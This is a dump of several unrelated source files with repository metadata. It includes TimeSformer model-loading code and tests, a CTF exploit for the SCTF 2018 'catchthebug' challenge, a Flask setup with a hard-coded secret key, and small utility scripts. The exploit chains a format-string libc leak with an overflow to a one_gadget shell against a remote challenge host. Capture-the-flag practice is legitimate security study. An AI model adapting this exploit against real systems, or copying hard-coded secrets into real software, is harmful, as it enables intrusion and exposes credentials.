    prefixes left by wrapper modules are stripped from parameter names.

    Args:
        checkpoint_path: path to a torch checkpoint file.
        use_ema: prefer the 'state_dict_ema' entry when present.

    Returns:
        A mapping of parameter name -> tensor.

    Raises:
        FileNotFoundError: if `checkpoint_path` is empty or not a file.
    """
    if checkpoint_path and os.path.isfile(checkpoint_path):
        checkpoint = torch.load(checkpoint_path, map_location='cpu')
        state_dict_key = 'state_dict'
        if isinstance(checkpoint, dict):
            if use_ema and 'state_dict_ema' in checkpoint:
                state_dict_key = 'state_dict_ema'
        if state_dict_key and state_dict_key in checkpoint:
            new_state_dict = OrderedDict()
            for k, v in checkpoint[state_dict_key].items():
                # Strip the 'module.' prefix added by DataParallel-style
                # wrappers; checking for the dot avoids mangling keys that
                # merely start with the word 'module'.
                name = k[7:] if k.startswith('module.') else k
                new_state_dict[name] = v
            state_dict = new_state_dict
        elif 'model_state' in checkpoint:
            state_dict_key = 'model_state'
            new_state_dict = OrderedDict()
            for k, v in checkpoint[state_dict_key].items():
                # Strip the 'model.' prefix used by some trainers.
                name = k[6:] if k.startswith('model.') else k
                new_state_dict[name] = v
            state_dict = new_state_dict
        else:
            state_dict = checkpoint
        _logger.info("Loaded {} from checkpoint '{}'".format(state_dict_key, checkpoint_path))
        return state_dict
    else:
        _logger.error("No checkpoint found at '{}'".format(checkpoint_path))
        raise FileNotFoundError("No checkpoint found at '{}'".format(checkpoint_path))
def load_pretrained(model, cfg=None, num_classes=1000, in_chans=3, filter_fn=None, img_size=224, num_frames=8, num_patches=196, attention_type='divided_space_time', pretrained_model='', strict=True):
    """Load pretrained ViT weights into `model`, adapting them to the
    target input channels, classifier size, patch grid, frame count and
    attention type.  Falls back to random init when no URL is configured.
    """
    if cfg is None:
        cfg = getattr(model, 'default_cfg')
    if cfg is None or 'url' not in cfg or not cfg['url']:
        _logger.warning('Pretrained model URL is invalid, using random initialization.')
        return
    if len(pretrained_model) == 0:
        state_dict = model_zoo.load_url(cfg['url'], progress=False, map_location='cpu')
    else:
        # Some checkpoints nest the weights under a 'model' key.
        # NOTE(review): the bare except also hides unrelated errors --
        # consider narrowing to (KeyError, TypeError).
        try:
            state_dict = load_state_dict(pretrained_model)['model']
        except:
            state_dict = load_state_dict(pretrained_model)
    if filter_fn is not None:
        state_dict = filter_fn(state_dict)
    if in_chans == 1:
        # Collapse the RGB filters of the first conv into a single channel.
        conv1_name = cfg['first_conv']
        _logger.info('Converting first conv (%s) pretrained weights from 3 to 1 channel' % conv1_name)
        conv1_weight = state_dict[conv1_name + '.weight']
        conv1_type = conv1_weight.dtype
        conv1_weight = conv1_weight.float()
        O, I, J, K = conv1_weight.shape
        if I > 3:
            assert conv1_weight.shape[1] % 3 == 0
            conv1_weight = conv1_weight.reshape(O, I // 3, 3, J, K)
            conv1_weight = conv1_weight.sum(dim=2, keepdim=False)
        else:
            conv1_weight = conv1_weight.sum(dim=1, keepdim=True)
        conv1_weight = conv1_weight
        state_dict[conv1_name + '.weight'] = conv1_weight
    elif in_chans != 3:
        # Repeat and rescale RGB filters for other channel counts, or drop
        # the first conv entirely when shapes cannot be adapted.
        conv1_name = cfg['first_conv']
        conv1_weight = state_dict[conv1_name + '.weight']
        conv1_type = conv1_weight.dtype
        conv1_weight = conv1_weight.float()
        O, I, J, K = conv1_weight.shape
        if I != 3:
            _logger.warning('Deleting first conv (%s) from pretrained weights.' % conv1_name)
            del state_dict[conv1_name + '.weight']
            strict = False
        else:
            _logger.info('Repeating first conv (%s) weights in channel dim.' % conv1_name)
            repeat = int(math.ceil(in_chans / 3))
            conv1_weight = conv1_weight.repeat(1, repeat, 1, 1)[:, :in_chans, :, :]
            conv1_weight *= 3 / float(in_chans)
            conv1_weight = conv1_weight
            state_dict[conv1_name + '.weight'] = conv1_weight
    classifier_name = cfg['classifier']
    if num_classes == 1000 and cfg['num_classes'] == 1001:
        # Drop the background class of 1001-way (Inception-style) heads.
        classifier_weight = state_dict[classifier_name + '.weight']
        state_dict[classifier_name + '.weight'] = classifier_weight[1:]
        classifier_bias = state_dict[classifier_name + '.bias']
        state_dict[classifier_name + '.bias'] = classifier_bias[1:]
    elif num_classes != state_dict[classifier_name + '.weight'].size(0):
        # Head size differs: discard it and keep the model's own init.
        del state_dict[classifier_name + '.weight']
        del state_dict[classifier_name + '.bias']
        strict = False
    if num_patches + 1 != state_dict['pos_embed'].size(1):
        # Resize the spatial position embedding to the new patch count,
        # keeping the CLS slot untouched.
        pos_embed = state_dict['pos_embed']
        cls_pos_embed = pos_embed[0, 0, :].unsqueeze(0).unsqueeze(1)
        other_pos_embed = pos_embed[0, 1:, :].unsqueeze(0).transpose(1, 2)
        new_pos_embed = F.interpolate(other_pos_embed, size=num_patches, mode='nearest')
        new_pos_embed = new_pos_embed.transpose(1, 2)
        new_pos_embed = torch.cat((cls_pos_embed, new_pos_embed), 1)
        state_dict['pos_embed'] = new_pos_embed
    if 'time_embed' in state_dict and num_frames != state_dict['time_embed'].size(1):
        # Resize the temporal embedding to the new number of frames.
        time_embed = state_dict['time_embed'].transpose(1, 2)
        new_time_embed = F.interpolate(time_embed, size=num_frames, mode='nearest')
        state_dict['time_embed'] = new_time_embed.transpose(1, 2)
    if attention_type == 'divided_space_time':
        # Seed temporal attention/norm weights from their spatial
        # counterparts when the checkpoint lacks them.
        new_state_dict = state_dict.copy()
        for key in state_dict:
            if 'blocks' in key and 'attn' in key:
                new_key = key.replace('attn', 'temporal_attn')
                if not new_key in state_dict:
                    new_state_dict[new_key] = state_dict[key]
                else:
                    new_state_dict[new_key] = state_dict[new_key]
            if 'blocks' in key and 'norm1' in key:
                new_key = key.replace('norm1', 'temporal_norm1')
                if not new_key in state_dict:
                    new_state_dict[new_key] = state_dict[key]
                else:
                    new_state_dict[new_key] = state_dict[new_key]
        state_dict = new_state_dict
    # NOTE(review): `strict` is adjusted above but never forwarded -- the
    # load below is always non-strict.  Confirm whether `strict=strict`
    # was intended.
    model.load_state_dict(state_dict, strict=False)
class vit_base_patch16_224(nn.Module):
    """TimeSformer backbone: ViT-B/16 configured from a project cfg object."""

    def __init__(self, cfg, **kwargs):
        super(vit_base_patch16_224, self).__init__()
        self.pretrained = True
        patch_size = 16
        self.model = VisionTransformer(
            img_size=cfg.DATA.TRAIN_CROP_SIZE,
            num_classes=cfg.MODEL.NUM_CLASSES,
            patch_size=patch_size,
            embed_dim=768,
            depth=12,
            num_heads=12,
            mlp_ratio=4,
            qkv_bias=True,
            norm_layer=partial(nn.LayerNorm, eps=1e-06),
            drop_rate=0.0,
            attn_drop_rate=0.0,
            drop_path_rate=0.1,
            num_frames=cfg.DATA.NUM_FRAMES,
            attention_type=cfg.TIMESFORMER.ATTENTION_TYPE,
            **kwargs)
        self.attention_type = cfg.TIMESFORMER.ATTENTION_TYPE
        self.model.default_cfg = default_cfgs['vit_base_patch16_224']
        # Patches per frame at the training crop size.
        grid = cfg.DATA.TRAIN_CROP_SIZE // patch_size
        self.num_patches = grid * grid
        pretrained_model = cfg.TIMESFORMER.PRETRAINED_MODEL
        if self.pretrained:
            load_pretrained(self.model, num_classes=self.model.num_classes,
                            in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter,
                            img_size=cfg.DATA.TRAIN_CROP_SIZE, num_patches=self.num_patches,
                            attention_type=self.attention_type,
                            pretrained_model=pretrained_model)

    def forward(self, x):
        # Delegate to the wrapped VisionTransformer.
        return self.model(x)
class TimeSformer(nn.Module):
    """Standalone TimeSformer wrapper with an explicit constructor API."""

    def __init__(self, img_size=224, patch_size=16, num_classes=400, num_frames=8, attention_type='divided_space_time', pretrained_model='', **kwargs):
        super(TimeSformer, self).__init__()
        self.pretrained = True
        self.model = VisionTransformer(
            img_size=img_size,
            num_classes=num_classes,
            patch_size=patch_size,
            embed_dim=768,
            depth=12,
            num_heads=12,
            mlp_ratio=4,
            qkv_bias=True,
            norm_layer=partial(nn.LayerNorm, eps=1e-06),
            drop_rate=0.0,
            attn_drop_rate=0.0,
            drop_path_rate=0.1,
            num_frames=num_frames,
            attention_type=attention_type,
            **kwargs)
        self.attention_type = attention_type
        self.model.default_cfg = default_cfgs['vit_base_patch' + str(patch_size) + '_224']
        # Patches per frame at the configured image size.
        side = img_size // patch_size
        self.num_patches = side * side
        if self.pretrained:
            load_pretrained(self.model, num_classes=self.model.num_classes,
                            in_chans=kwargs.get('in_chans', 3), filter_fn=_conv_filter,
                            img_size=img_size, num_frames=num_frames,
                            num_patches=self.num_patches,
                            attention_type=self.attention_type,
                            pretrained_model=pretrained_model)

    def forward(self, x):
        # Delegate to the wrapped VisionTransformer.
        return self.model(x)
import torch
from torch.nn import MSELoss, ReLU
from _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile
# Auto-generated parity cases: each tuple is (module class, factory for
# (init args, init kwargs), factory for (forward args, forward kwargs),
# whether torch.jit compilation is expected to succeed).
TESTCASES = [
    # (nn.Module, init_args, forward_args, jit_compiles)
    (BasicTransform,
     lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1}),
     lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
     True),
    (BottleneckTransform,
     lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
     lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
     True),
    (Conv2dSame,
     lambda: ([], {'in_channels': 4, 'out_channels': 4, 'kernel_size': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     False),
    (DropPath,
     lambda: ([], {}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     False),
    (Linear,
     lambda: ([], {'in_features': 4, 'out_features': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (Mlp,
     lambda: ([], {'in_features': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (Nonlocal,
     lambda: ([], {'dim': 4, 'dim_inner': 4}),
     lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
     False),
    (ResNetBasicStem,
     lambda: ([], {'dim_in': 4, 'dim_out': 4, 'kernel': 4, 'stride': 1, 'padding': 4}),
     lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
     True),
    (SE,
     lambda: ([], {'dim_in': 4, 'ratio': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (Swish,
     lambda: ([], {}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     False),
    (X3DTransform,
     lambda: ([], {'dim_in': 4, 'dim_out': 4, 'temp_kernel_size': 4, 'stride': 1, 'dim_inner': 4, 'num_groups': 1}),
     lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
     False),
]
class Test_facebookresearch_TimeSformer(_paritybench_base):
    """Generated parity-bench suite: one test method per TESTCASES entry."""
    def test_000(self):
        self._check(*TESTCASES[0])
    def test_001(self):
        self._check(*TESTCASES[1])
    def test_002(self):
        self._check(*TESTCASES[2])
    def test_003(self):
        self._check(*TESTCASES[3])
    def test_004(self):
        self._check(*TESTCASES[4])
    def test_005(self):
        self._check(*TESTCASES[5])
    def test_006(self):
        self._check(*TESTCASES[6])
    def test_007(self):
        self._check(*TESTCASES[7])
    def test_008(self):
        self._check(*TESTCASES[8])
    def test_009(self):
        self._check(*TESTCASES[9])
    def test_010(self):
        self._check(*TESTCASES[10])
|
[
"[email protected]"
] | |
ce4cb92d76d50fbd63accaff41bd8af8bbd952e1
|
0f9b6a33a5e2ce627db75d1bcc34bc3f3674335b
|
/sctf/2018/catchthebug/exploit.py
|
10ff19c7084f606481adcd2e34de7136bf30a20a
|
[] |
no_license
|
hnoson/writeups
|
359a33b03286bab19359ad9b089e6f3bfe4fb708
|
05550e3c462108f6c5ba0b69f65694e2eb1dc9b3
|
refs/heads/master
| 2021-10-07T18:21:26.041101 | 2021-10-03T10:22:31 | 2021-10-03T10:22:31 | 119,823,623 | 7 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,927 |
py
|
#!/usr/bin/env python
from pwn import *
def catch(name):
    # Keep choosing menu option 1 until a bug actually appears, then send
    # its name.  `name` is sent raw -- no trailing newline is added.
    while True:
        s.sendlineafter('>> ', '1')
        s.recvline()
        if s.recvline(False) == 'There is no bug =(':
            continue
        s.sendafter('>> ', name)
        break
def inspect(num):
    # Read `num` bug entries from the inspect menu; returns a list of
    # (name, body_length) tuples parsed from the banner-delimited output.
    s.sendlineafter('>> ', '2')
    ret = []
    for i in range(num):
        s.recvuntil('==\n')
        ret.append((s.recvline(False), len(s.recvuntil('=')) - 2))
    return ret
def submit(title = 'A' * 0x40, subtitle = 'A' * 0x80, body = 'A' * 0x100, tag = 'A' * 8, password = 'A' * 8):
    # Fill the report form (menu option 3).  Fields shorter than their
    # buffer get a newline appended so the read terminates.
    s.sendlineafter('>> ', '3')
    s.sendafter('title\n', title)
    s.sendafter('subtitle\n', subtitle)
    if len(body) < 0x100:
        body += '\n'
    s.sendafter('body\n', body)
    if len(tag) < 8:
        tag += '\n'
    s.sendafter('tag\n', tag)
    s.sendafter('password\n', password)
if __name__ == '__main__':
    # context.log_level = 'DEBUG'
    if len(sys.argv) == 1:
        s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66')
        # s = process('./bug_3e99623da36874fd424a4e237866e301d292aa66', env = {'LD_PRELOAD': './libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c'})
    else:
        s = remote('catchthebug.eatpwnnosleep.com', 55555)
    libc = ELF('./libc-2.26.so_cc8df6278e095fcc4ca8a98e1f1c69c04db30a4c')
    one_gadgets = [0x47c46, 0x47c9a, 0xfccde, 0xfdb8e]
    # Leak a libc pointer via the format string placed in the first bug name.
    catch('%p\n')
    catch('AAAA')
    catch('AAAA')
    res = inspect(3)
    libc_base = int(res[0][0], 16) - libc.symbols['_IO_2_1_stdout_'] - 131
    log.info('libc base: %#x' % libc_base)
    # Total report length decides where the overflow lands; retry if short.
    length = 8 * 3 + sum([l for _, l in res]) + 0x40 + 0x80
    log.info('report length: %#x' % length)
    if length < 0x618:
        print 'try again'
        exit(0)
    body = 'A' * (0x708 - length)
    body += p64(libc_base + 0x608040 + 3840 - len(body) - 0x9)
    tag = p64(libc_base + one_gadgets[2])
    submit(body = body, tag = tag)
    s.interactive()
|
[
"[email protected]"
] | |
1dccae090daff9f46736e852a5612870a5d07f5c
|
c08e6d8860ad978d89c4735069f45c97c1967a70
|
/compare_obj/compare_obj.py
|
ccebc82ba33156d6e8d56fd74e535c910be8e3ff
|
[] |
no_license
|
leayl/project_exercises
|
bad5158a7fd851d9ddf05c1f4a758acac1953e5b
|
ce97c5bc36e2a49e39407ea6dbf599421510dc5f
|
refs/heads/master
| 2021-01-26T02:42:33.835830 | 2020-04-28T18:15:03 | 2020-04-28T18:15:03 | 243,278,015 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,335 |
py
|
import random
class MyClass():
    # Minimal record wrapper: `dict` holds one object's attribute mapping.
    def __init__(self):
        self.dict = {}
def create_2_cls_obj_list(list1, list2):
    """Wrap every attribute dict from both input lists in a MyClass holder."""
    def wrap(dicts):
        wrapped = []
        for record in dicts:
            holder = MyClass()
            holder.dict = record
            wrapped.append(holder)
        return wrapped

    return wrap(list1), wrap(list2)
def compare_obj(list1, list2):
    """Greedily align the records of `list1` and `list2` by similarity.

    Returns two equal-length lists; position i of each holds a matched
    pair, or (obj, None) / (None, obj) for records left unmatched.
    """
    obj_list1, obj_list2 = create_2_cls_obj_list(list1, list2)
    all_compare_list = create_all_compare_list(obj_list1, obj_list2)
    # Best-scoring pairs are matched first (greedy, not globally optimal).
    all_compare_list = sorted(all_compare_list, key=lambda group: group[2], reverse=True)
    all_list_len = len(all_compare_list)
    align_list1 = []
    align_list2 = []
    for i in range(all_list_len):
        group = all_compare_list[i]
        obj1 = group[0]
        obj2 = group[1]
        degree = group[2]
        # Pair only if both sides are still unmatched and share something.
        if degree > 0 and obj1 not in align_list1 and obj2 not in align_list2:
            align_list1.append(obj1)
            align_list2.append(obj2)
            obj_list1.remove(obj1)
            obj_list2.remove(obj2)
    # Records of list1 that found no partner (treated as lost).
    for obj1 in obj_list1:
        align_list1.append(obj1)
        align_list2.append(None)
    # Records of list2 that found no partner (treated as added).
    for obj2 in obj_list2:
        align_list1.append(None)
        align_list2.append(obj2)
    return align_list1, align_list2
def create_all_compare_list(obj_list1, obj_list2):
    """Score every (obj1, obj2) pairing across the two object lists."""
    return [
        compare_objects_degree(left, right)
        for left in obj_list1
        for right in obj_list2
    ]
def compare_objects_degree(obj1, obj2):
    """Score how similar two objects' attribute dicts are.

    Returns ``[obj1, obj2, degree]`` where ``degree`` counts shared keys
    holding equal values; when every shared key matches (and at least one
    key is shared) a sentinel score of 1000 marks a perfect match.
    """
    shared = obj1.dict.keys() & obj2.dict.keys()
    matches = sum(1 for key in shared if obj1.dict[key] == obj2.dict[key])
    if matches and matches == len(shared):
        return [obj1, obj2, 1000]
    return [obj1, obj2, matches]
def out_single_file(fb, obj):
    """Write a lost/added object's attributes to `fb`, one ` |--k=v` line each."""
    lines = [f" |--{key}={value}\n" for key, value in obj.dict.items()]
    fb.write("".join(lines))
    # Blank separator between objects.
    fb.write("\n\n")
def out_diff_file(fb, obj1, obj2):
    """Write a side-by-side attribute comparison of two matched objects.

    The left column (padded to 40 chars) shows `obj1`, the right `obj2`;
    a ` |-- =` placeholder marks a key missing on one side.
    """
    # Union of keys, preserving obj1's order first, then obj2's extras.
    ordered_keys = list(dict.fromkeys(list(obj1.dict) + list(obj2.dict)))
    for key in ordered_keys:
        in_left = key in obj1.dict
        in_right = key in obj2.dict
        if in_left and in_right:
            left = f" |--{key}={obj1.dict[key]}"
            right = f" |--{key}={obj2.dict[key]}\n"
        elif in_left:
            left = f" |--{key}={obj1.dict[key]}"
            right = " |-- =\n"
        else:
            left = " |-- = "
            right = f" |--{key}={obj2.dict[key]}\n"
        fb.write(left.ljust(40, ' ') + right)
    # Blank separator between object pairs.
    fb.write("\n\n")
def out_all_files(list1, list2):
    """Align two lists of attribute dicts and write three report files.

    Produces, under ``result/``: a file of objects missing from `list2`
    ("lost"), a file of objects new in `list2` ("added"), and a
    side-by-side diff of matched pairs.  The output directory is created
    if it does not exist (the original crashed with FileNotFoundError on
    a fresh checkout).
    """
    import os
    os.makedirs("result", exist_ok=True)
    lost_obj_file = "result/丢失的对象.txt"
    add_obj_file = "result/新增的对象.txt"
    diff_obj_file = "result/对象对比.txt"
    obj_list1, obj_list2 = compare_obj(list1, list2)
    # Single flat `with` instead of three nested ones.
    with open(lost_obj_file, 'w') as lost_file, \
            open(add_obj_file, 'w') as add_file, \
            open(diff_obj_file, 'w') as diff_file:
        for obj1, obj2 in zip(obj_list1, obj_list2):
            if obj1 is None:
                out_single_file(add_file, obj2)
            elif obj2 is None:
                out_single_file(lost_file, obj1)
            else:
                out_diff_file(diff_file, obj1, obj2)
if __name__ == '__main__':
    # Demo run: two sample record lists with overlapping ids, changed
    # values, missing keys and extra records on both sides.
    dict_list1 = [
        {
            "id": 1,
            "name": "name1",
            "age": 11,
            "gender": "woman",
            "color": "blue",
        },
        {
            "id": 2,
            "name": "name2",
            "age": 5,
            "gender": "woman",
            "color": "pink",
        },
        {
            "id": 3,
            "name": "name3",
            "age": 55,
            "gender": "man",
            "color": "black",
        },
        {
            "id": 4,
            "name": "name4",
            "age": 2,
            "gender": "man",
            "color": "orange",
        },
    ]
    dict_list2 = [
        {
            "id": 1,
            "name": "name111",
            "age": 16,
            "gender": "woman",
            "color": "blue:pink:ooo",
        },
        {
            "id": 6,
            "name": "name6",
            "age": 6,
            "gender": "",
            "color": "pnk",
        },
        {
            "id": 3,
            "name": "name3",
            "age": 20,
            "gender": "man",
            "color": "black",
            "area": "America",
        },
        {
            "id": 4,
            "name": "name4",
            # "gender": "man",
            "color": "",
        },
        {
            "id": 20,
            "name": "name20",
            "gender": "man",
            "color": "green",
            "music": "sunset......",
        },
    ]
    out_all_files(dict_list1, dict_list2)
|
[
"[email protected]"
] | |
af7ca80306f6f187b11809bd23a256bb4f539dbe
|
e2ad7b63641e06e15df15eb76b1f806fe2ea11c0
|
/basics/programming/ex10.py
|
1572ec2c61c100c8164f46a7661e139b1a620e50
|
[
"Apache-2.0"
] |
permissive
|
LarsTD/answers
|
9b9e04cd3bf7e49a098d39584049523ddc9a1441
|
63b1fcdc1d31182407b072e064ba45d0366aff14
|
refs/heads/master
| 2020-04-09T18:40:12.940835 | 2018-12-12T11:21:48 | 2018-12-12T11:21:48 | 160,519,894 | 0 | 0 |
Apache-2.0
| 2018-12-05T13:09:04 | 2018-12-05T13:09:04 | null |
UTF-8
|
Python
| false | false | 431 |
py
|
print('Pick an operation')
# Loop until the user enters a recognised operator (+ or -).
operation = ''
while not operation:
    print('enter an valid operator')
    answer=input()
    if answer == '+':
        operation = '+'
    elif answer == '-':
        operation = '-'
print('enter your first number')
number_1 = int(input())
print('enter your second number')
number_2 = int(input())
# Apply the chosen operation and print the result.
if operation == '+':
    print(number_1 + number_2)
else:
    print(number_1 - number_2)
|
[
"[email protected]"
] | |
b6f2702ecdab755613afbcabab71516a8bdab2a5
|
ea0118797c975d569f315f240f0c0c621f1649e1
|
/scheduler_code/scheduler/__init__.py
|
8e8b92d40c6bced828c5977e1d5df5b82fd1e520
|
[] |
no_license
|
haitonglin/CS316_F20_Team8
|
29e943f1064e3e8b254a392978e3e2ce1ce4168a
|
a20b14362c3044a50c40fb1e01e3e85c7ecbebee
|
refs/heads/main
| 2023-01-23T06:34:47.908752 | 2020-11-17T18:50:45 | 2020-11-17T18:50:45 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 465 |
py
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
app = Flask(__name__)
# NOTE(review): secret key is hard-coded in source -- move it to an
# environment variable or config file before deploying.
app.config['SECRET_KEY'] = '5791628bb0b13ce0c676dfde280ba245'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
db = SQLAlchemy(app)
bcrypt = Bcrypt(app)
login_manager = LoginManager(app)
# Unauthenticated users are redirected to the 'login' view; the flash
# message uses the 'info' category.
login_manager.login_view = 'login'
login_manager.login_message_category = 'info'
# Imported last on purpose (circular import): routes needs `app` above.
from scheduler import routes
|
[
"[email protected]"
] | |
c774a33d908e3d62f2abbecc5399589352c6b667
|
644cd6849385c1e142acb01a538843a42c7a82ce
|
/experiments/sample_feature.py
|
3f492c466b505a276939802a8eef2ea6d4195032
|
[] |
no_license
|
dcrankshaw/clipper-plots
|
0a4f2833ad22fe13e4f341bb1d7d90d883c52e75
|
1398f99c64f1aab238a46c00f307f26dce1bde97
|
refs/heads/master
| 2021-01-22T13:57:25.894553 | 2017-02-24T07:23:12 | 2017-02-24T07:23:24 | 46,454,875 | 1 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,390 |
py
|
import pandas as pd
import numpy as np
import sklearn.linear_model as lm
import sklearn.svm as svm
from sklearn.externals import joblib
import os
import sys
def load_digits(digits_location, digits_filename = "train.data"):
    """Load the digits CSV and return (features X, labels y).

    The first column of each row is the label; the rest are pixel values.
    """
    digits_path = digits_location + "/" + digits_filename
    print "Source file:", digits_path
    df = pd.read_csv(digits_path, sep=",", header=None)
    data = df.values
    print "Number of image files:", len(data)
    y = data[:,0]
    X = data[:,1:]
    return (X, y)
# One-vs-rest SVM feature: predicts whether a digit matches this label.
# NOTE(review): the original comment said "predicts if digit is 1", but
# the trained target is `label + 1` -- confirm the intended 1-based shift.
class TestFeature:
    def __init__(self, digits_loc, label):
        # Labels in the data appear to be 1-based; shift accordingly.
        self.label = label + 1
        X, y = load_digits(digits_loc)
        # Per-feature standardisation statistics from the training set.
        self.mu = np.mean(X,0)
        self.sigma = np.var(X,0)
        Z = self.normalize_digits(X)
        my_y = [1. if i == self.label else 0. for i in y]
        print np.count_nonzero(my_y)
        model = svm.SVC()
        model.fit(Z, my_y)
        self.model = model
    def normalize_digits(self, X):
        # Zero-mean / unit-std scaling; zero-variance features divide by 1.
        Z = (X - self.mu) / np.array([np.sqrt(z) if z > 0 else 1. for z in self.sigma])
        return Z
    def predict(self, x):
        z = self.normalize_digits(x)
        return self.model.predict(z)
    def hash_input(self, x):
        # Content hash of the raw input buffer (for caching/deduplication).
        return hash(x.data.tobytes())
if __name__=='__main__':
    digits_loc = "/crankshaw-local/mnist/data"
    # Train one one-vs-rest SVM per label in the inclusive [start, end] range.
    start = int(sys.argv[1])
    end = int(sys.argv[2])
    for label in range(start,end + 1):
        f_name = "predict_%d_svm" % label
        try:
            os.mkdir('sklearn_models/%s' % f_name)
        except OSError:
            print("directory already exists. Might overwrite existing file")
        print "training label %d" % label
        f = TestFeature(digits_loc, label)
        joblib.dump(f, 'sklearn_models/%s/%s.pkl' % (f_name, f_name))
    # f = joblib.load('test_model/predict_1_svm.pkl')
    # print "model trained"
    # test_x, test_y = load_digits(digits_loc, digits_filename="test-mnist-dense-with-labels.data")
    # pred_wrong = 0.
    # pred_total = 200
    # for i in range(pred_total):
    # idx = np.random.randint(len(test_y))
    # y_p = f.predict(test_x[idx])[0]
    # y_t = test_y[idx] - 1
    # if y_t == f.label:
    # y_t = 1.0
    # else:
    # y_t = 0.0
    # if y_t != y_p:
    # pred_wrong += 1.
    # print float(pred_wrong)/float(pred_total)
|
[
"[email protected]"
] | |
c42a9905f1b7ec50d3d141f11e5ae4b21046be4a
|
9ae5863f44403255a3068d4e09df8e9a76cf6fb9
|
/Lv1/DuplicateNumbers.py
|
4b6de77b848cb534002934558f00e3a8e7aad5e8
|
[] |
no_license
|
ybear90/coding_dojang_solution-practice-
|
42f564ac9c48311538bdbf02932498efbd0e7dab
|
644cbe02bd52d84fdbb84faf3938aa26855ed24c
|
refs/heads/master
| 2020-04-20T12:08:08.702191 | 2019-05-31T17:39:00 | 2019-05-31T17:39:00 | 168,835,727 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
"""
Duplicate Numbers
일전에 뭐 게임 회사에서 본 간단한 퀴즈 테스트 입니다.
0~9까지의 문자로 된 숫자를 입력 받았을 때, 이 입력 값이 0~9까지의 숫자가 각각 한 번 씩만 사용된 것인지 확인하는 함수를 구하시오.
sample inputs: 0123456789 01234 01234567890 6789012345 012322456789
sample outputs: true false false true false
"""
# Read a whitespace-separated list of digit strings from stdin.
r_input = input().split()
def inputInit(cList):
    """Reset the first ten counter slots of `cList` to zero (in place)."""
    idx = 0
    while idx < 10:
        cList[idx] = 0
        idx += 1
def DuplicateNumbers(lList):
    """Print per-digit counts and whether each string uses 0-9 exactly once.

    For every token the ten digit counts are printed, then the final list
    of True/False verdicts is printed (True = each digit used once).
    """
    check_value = [True] * len(lList)
    check_input = [0] * 10
    for idx, token in enumerate(lList):
        # Tally how often each digit occurs in this token.
        for ch in token:
            check_input[int(ch)] += 1
        # A valid token uses every digit exactly once.
        for count in check_input:
            print(count)
            if count != 1:
                check_value[idx] = False
        inputInit(check_input)
    print(check_value)
# Check every input token for exactly-once digit usage.
DuplicateNumbers(r_input)
|
[
"[email protected]"
] | |
3ef7e25a59a3ca2672554115318f33e31822fd25
|
e5dc27e634aba70bcd1b3acea74fed84ddccf837
|
/plugins/modules/template_project.py
|
432a757ecb62ba97acf49d326d6c97cb68fe269b
|
[] |
no_license
|
jejrichardson/dnacenter-ansible
|
264d1b52227d4bf78ad175494763cff9e7881f34
|
f10078ef8323bda4b542e71bcecf4f80a7fe0609
|
refs/heads/master
| 2023-01-28T09:54:57.449459 | 2020-12-09T23:15:49 | 2020-12-09T23:15:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,792 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Rafael Campos <[email protected]>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
# Ansible module metadata: development status and support channel.
ANSIBLE_METADATA = {
    "metadata_version": "0.0.1",
    "status": ["preview"],
    "supported_by": "community",
}
DOCUMENTATION = r"""
---
module: template_project
short_description: Manage TemplateProject objects of ConfigurationTemplates
description:
- Returns the projects in the system.
- Creates a new project.
- Updates an existing project.
- Deletes an existing Project.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
name:
description:
- Name of project to be searched.
- ProjectDTO's name.
type: str
createTime:
description:
- ProjectDTO's createTime.
type: int
description:
description:
- ProjectDTO's description.
type: str
id:
description:
- ProjectDTO's id.
type: str
lastUpdateTime:
description:
- ProjectDTO's lastUpdateTime.
type: int
tags:
description:
- ProjectDTO's tags (list of strings).
type: list
templates:
description:
- ProjectDTO's templates.
type: dict
project_id:
description:
- ProjectId path parameter.
- Required for state delete.
type: str
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.template_project
# Reference by Internet resource
- name: TemplateProject reference
description: Complete reference of the TemplateProject object model.
link: https://developer.cisco.com/docs/dna-center/api/1-3-3-x
# Reference by Internet resource
- name: TemplateProject reference
description: SDK reference.
link: https://dnacentersdk.readthedocs.io/en/latest/api/api.html#v2-1-1-summary
"""
EXAMPLES = r"""
- name: get_projects
cisco.dnac.template_project:
state: query # required
name: SomeValue # string
register: query_result
- name: create_project
cisco.dnac.template_project:
state: create # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
name: SomeValue # string
tags:
- SomeValue # string
templates: None
- name: update_project
cisco.dnac.template_project:
state: update # required
createTime: 1 # integer
description: SomeValue # string
id: SomeValue # string
lastUpdateTime: 1 # integer
